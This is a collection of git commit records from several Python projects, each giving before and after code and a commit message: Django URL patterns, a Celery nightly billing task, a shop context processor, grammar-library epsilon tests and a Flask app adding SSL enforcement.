#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
Drop patterns import for Django 1.0 compatibility.
|
Drop patterns import for Django 1.0 compatibility.
|
Python
|
agpl-3.0
|
lamby/django-agpl,lamby/django-agpl
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
Drop patterns import for Django 1.0 compatibility.
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
<commit_before># -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
<commit_msg>Drop patterns import for Django 1.0 compatibility.<commit_after>
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
Drop patterns import for Django 1.0 compatibility.# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
<commit_before># -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
<commit_msg>Drop patterns import for Django 1.0 compatibility.<commit_after># -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
99d1357c379b2df5219891da7f64e4584060f069
|
app/celery/reporting_tasks.py
|
app/celery/reporting_tasks.py
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
Fix the logging message in the nightly task
|
Fix the logging message in the nightly task
|
Python
|
mit
|
alphagov/notifications-api,alphagov/notifications-api
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
Fix the logging message in the nightly task
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
<commit_before>from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
<commit_msg>Fix the logging message in the nightly task<commit_after>
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
Fix the logging message in the nightly taskfrom datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
<commit_before>from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info("create-nightly-billing task complete. {} rows updated".format(len(transit_data)))
<commit_msg>Fix the logging message in the nightly task<commit_after>from datetime import datetime, timedelta
from flask import current_app
from notifications_utils.statsd_decorators import statsd
from app import notify_celery
from app.dao.fact_billing_dao import (
fetch_billing_data_for_day,
update_fact_billing
)
@notify_celery.task(name="create-nightly-billing")
@statsd(namespace="tasks")
def create_nightly_billing(day_start=None):
# day_start is a datetime.date() object. e.g.
# 3 days of data counting back from day_start is consolidated
if day_start is None:
day_start = datetime.today() - timedelta(days=1)
for i in range(0, 3):
process_day = day_start - timedelta(days=i)
transit_data = fetch_billing_data_for_day(process_day=process_day)
for data in transit_data:
update_fact_billing(data, process_day)
current_app.logger.info(
"create-nightly-billing task complete. {} rows updated for day: {}".format(len(transit_data, process_day)))
|
987c54559cb52370fc459a30cdbdfd0e38c5ef62
|
plata/context_processors.py
|
plata/context_processors.py
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
Add the variable `plata.price_includes_tax` to the template context
|
Add the variable `plata.price_includes_tax` to the template context
|
Python
|
bsd-3-clause
|
armicron/plata,armicron/plata,stefanklug/plata,armicron/plata
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
Add the variable `plata.price_includes_tax` to the template context
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
<commit_before>import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
<commit_msg>Add the variable `plata.price_includes_tax` to the template context<commit_after>
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
Add the variable `plata.price_includes_tax` to the template contextimport plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
<commit_before>import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
}}
<commit_msg>Add the variable `plata.price_includes_tax` to the template context<commit_after>import plata
def plata_context(request):
"""
Adds a few variables from Plata to the context if they are available:
* ``plata.shop``: The current :class:`plata.shop.views.Shop` instance
* ``plata.order``: The current order
* ``plata.contact``: The current contact instance
* ``plata.price_includes_tax``: Whether prices include tax or not
"""
shop = plata.shop_instance()
if not shop:
return {}
return {'plata': {
'shop': shop,
'order': shop.order_from_request(request),
'contact': shop.contact_from_user(request.user),
'price_includes_tax': plata.settings.PLATA_PRICE_INCLUDES_TAX,
}}
|
ae4b4fe5fb5c5774720dd3a14549aa88bde91043
|
tests/Epsilon_tests/ImportTest.py
|
tests/Epsilon_tests/ImportTest.py
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
Add tests to compare epsilon with another objects
|
Add tests to compare epsilon with another objects
|
Python
|
mit
|
PatrikValkovic/grammpy
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
Add tests to compare epsilon with another objects
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
<commit_before>#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
<commit_msg>Add tests to compare epsilon with another objects<commit_after>
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
Add tests to compare epsilon with another objects#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
<commit_before>#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS),id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
if __name__ == '__main__':
main()
<commit_msg>Add tests to compare epsilon with another objects<commit_after>#!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 23.06.2017 16:39
:Licence GNUv3
Part of grammpy
"""
from unittest import TestCase, main
from grammpy import EPS
from grammpy import EPSILON
class ImportTest(TestCase):
def test_idSame(self):
self.assertEqual(id(EPS), id(EPSILON))
def test_equal(self):
self.assertEqual(EPS, EPSILON)
def test_equalToSelf(self):
self.assertEqual(EPS, EPS)
def test_notEqualToNumber(self):
self.assertNotEqual(EPS, 5)
def test_notEqualToString(self):
self.assertNotEqual(EPS, "asdf")
def test_notEqualToObject(self):
self.assertNotEqual(EPS, object())
if __name__ == '__main__':
main()
|
86692e6fbbbc6a8db9e4c323eb0688865b81f717
|
slot/main.py
|
slot/main.py
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
Add SSLify to force SSL
|
Add SSLify to force SSL
|
Python
|
mit
|
nhshd-slot/SLOT,nhshd-slot/SLOT,nhshd-slot/SLOT
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
Add SSLify to force SSL
|
import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
<commit_before>import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
